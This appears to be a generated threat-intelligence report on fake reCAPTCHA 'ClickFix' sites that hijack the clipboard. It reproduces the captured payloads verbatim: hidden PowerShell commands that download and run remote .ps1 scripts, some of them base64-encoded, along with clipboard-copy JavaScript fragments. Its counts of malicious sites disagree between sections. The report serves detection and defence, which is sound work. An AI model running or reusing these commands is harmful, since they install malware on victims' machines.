Threat Intelligence Report
31
Total Sites Analyzed
20
Malicious Sites
65.0% detection rate
18
PowerShell Commands
52
Clipboard Hijacks
86
Avg Threat Score
Attack Pattern Analysis
35
High Risk Commands
15
Base64 Encoded
0
Obfuscated JS
0
JS Redirects
Malicious Sites Detected
Click on a site to view detailed analysishttps://riverview-pools.com/verify/index.html
27 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
2
powershell
3
clipboard
1
downloads
14
captcha
2
high risk commands
💻 PowerShell Commands 2
powershell " + htaPath;
iex (irm 'https://aatox.com/verify/45.ps1')
🔍 Suspicious Keywords 8
Command
✅
I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 5
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://aatox.com/verify/45.ps1
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://blessdayservices.org/up/
26 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
2
powershell
3
clipboard
3
downloads
14
captcha
4
high risk commands
💻 PowerShell Commands 2
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
🔍 Suspicious Keywords 7
✅
I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 5
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
📋 Clipboard Manipulation Code
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
https://jessespridecharters.com/v/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
3
downloads
14
captcha
3
high risk commands
💻 PowerShell Commands 1
powershell " + htaPath;
🔍 Suspicious Keywords 7
✅
I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 5
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://yogasitesdev.wpengine.com/2/15.ps1
📋 Clipboard Manipulation Code
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
https://mail.lucprofessional.com.br/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://test.peperoncinochepassione.it/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://lucprofessional.com.br/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.website.mypetapp.co.za/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.lucprofessional.grupomoltz.com.br/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://thesignaturemag.salviatech.com/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.bratusferramentas.grupomoltz.com.br/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://website.mypetapp.co.za/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://horno-rafelet.es/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://lucprofessional.grupomoltz.com.br/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.thesignaturemag.salviatech.com/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.test.peperoncinochepassione.it/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://my.salviatech.com/
25 indicators detected
Score: 90
PowerShell
Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands
💻 PowerShell Commands 1
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
🔍 Suspicious Keywords 8
✅
I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>
🌐 Extracted URLs 3
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
📋 Clipboard Manipulation Code
...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
http://101.32.40.22/
20 indicators detected
Score: 90
Clipboard Hijacking
Fake CAPTCHA
3
clipboard
11
captcha
🔍 Suspicious Keywords 6
✅
I am not a robot
Verification ID
reCAPTCHA Verification
I'm not a robot
<script>
🌐 Extracted URLs 4
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
📋 Clipboard Manipulation Code
...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
https://staplebrokenmetaliyro.blogspot.com/
55 indicators detected
Score: 90
Clipboard Hijacking
Fake CAPTCHA
1
clipboard
47
captcha
🔍 Suspicious Keywords 7
<script>
\x3d
\x3c
\x22
\x3e
\x27
display:none
🌐 Extracted URLs 46
http://www.w3.org/1999/xhtml
http://www.google.com/2005/gml/b
http://www.google.com/2005/gml/data
http://www.google.com/2005/gml/expr
https://electricreport.org/ygd4g
📋 Clipboard Manipulation Code
...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...
http://82.146.62.232/
16 indicators detected
Score: 60
Fake CAPTCHA
11
captcha
1
base64
🔍 Suspicious Keywords 4
exec(
eval(
<script>
display:none
🌐 Extracted URLs 15
https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/
https://barefootpilateslb.com/up/
5 indicators detected
Score: 30
Fake CAPTCHA
2
captcha
1
base64
🔍 Suspicious Keywords 2
<script src=
<script>
🌐 Extracted URLs 1
https://www.google.com
Technical Analysis
ClickGrab Threat Analysis Report - 2025-06-07
Generated on 2025-06-17 08:08:43
Executive Summary
- Total sites analyzed: 31
- Sites with malicious content: 18
- Unique domains encountered: 29
- Total URLs extracted: 141
- PowerShell download attempts: 20
- Clipboard manipulation instances: 34
Domain Analysis
Most Frequently Encountered Domains
- www.google.com: 29 occurrences
- use.fontawesome.com: 17 occurrences
- staplebrokenmetaliyro.blogspot.com: 15 occurrences
- cdnjs.cloudflare.com: 13 occurrences
- www.webgo.de: 10 occurrences
- draft.blogger.com: 9 occurrences
- t.me: 7 occurrences
- www.w3.org: 6 occurrences
- browser.certif-update.website: 4 occurrences
- svetvip.ru: 4 occurrences
- www.blogger.com: 4 occurrences
- api.whatsapp.com: 3 occurrences
- mc.yandex.ru: 2 occurrences
- www.blogblog.com: 2 occurrences
- www.offset.com: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
17 occurrences across 1 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
(17 times)
Font resources
30 occurrences across 2 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css
(17 times)https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
(13 times)
CDN hosted scripts
14 occurrences across 2 distinct URLs
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
(13 times)https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
(1 times)
Google resources
31 occurrences across 9 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
(17 times)https://www.google.com/intl/en/policies/privacy/
(4 times)https://www.google.com/intl/en/policies/terms/
(4 times)https://www.google.com
(1 times)http://www.google.com/2005/gml/b
(1 times)- ...and 4 more distinct URLs
Clipboard Manipulation Analysis
Detected clipboard manipulation in 34 instances.
Document.Execcommand Copy
Found in 34 snippets (100.0% of clipboard code)
Examples:
document.execCommand("copy")
Textarea Manipulation
Found in 34 snippets (100.0% of clipboard code)
Attack Pattern Reconstruction
Malicious Command Analysis
Identified 4 malicious command preparations.
Command 1:
powershell
Context:
WindowStyle Hidden -Command \"iex (irm 'https://aatox.com/verify/45.ps1')\""; const commandToRun = "powershell " + htaP...
Command 2:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Command 3:
powershell
Context:
...idden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " + htaPat...
Command 4:
powershell
Context:
= "-w hidden -c \"iwr 'https://yogasitesdev.wpengine.com/2/15.ps1' | iex\""; const commandToRun = "powershell " +...
Malicious Download Sources
https://aatox.com/verify/45.ps1
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1
https://yogasitesdev.wpengine.com/2/15.ps1
Key Findings
- Prevalence: 58.1% of analyzed sites contained malicious content
- Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
- Target Platform: Windows systems via PowerShell execution
- Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA
Recommendations
- User Education: Warn users about fake CAPTCHA verification schemes
- Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
- URL Filtering: Block known malicious domains identified in this analysis
- PowerShell Execution Policy: Restrict PowerShell execution in corporate environments